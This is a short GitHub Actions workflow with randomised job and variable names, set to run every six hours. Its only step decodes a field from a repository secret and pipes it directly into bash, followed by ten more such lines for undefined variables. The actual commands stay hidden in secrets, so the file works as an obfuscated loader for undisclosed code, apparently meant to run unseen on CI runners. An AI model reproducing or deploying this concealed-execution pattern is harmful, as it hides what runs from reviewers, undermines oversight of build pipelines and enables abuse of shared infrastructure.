name: zhengcunzai3456

on:
  workflow_dispatch:
  schedule:
    - cron: '50 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhengcunzai3456
        env:
          a1968: ${{ secrets.a1968 }}
        run: |
          echo $a1968 | jq -r .vckar2 | /bin/bash
          echo $mifxk5766 | jq -r .p7200 | /bin/bash
          echo $xsefo26489 | jq -r .hmrd84 | /bin/bash
          echo $zi30561 | jq -r .aif46 | /bin/bash
          echo $dqu185 | jq -r .qdf98397 | /bin/bash
          echo $wip1936 | jq -r .lys62589 | /bin/bash
          echo $ix5 | jq -r .lgz51 | /bin/bash
          echo $jhjwd39 | jq -r .eo14 | /bin/bash
          echo $cp0 | jq -r .avbpd67 | /bin/bash
          echo $rnyg747 | jq -r .wowg379 | /bin/bash
          echo $hyyq26409 | jq -r .dxnw20744 | /bin/bash

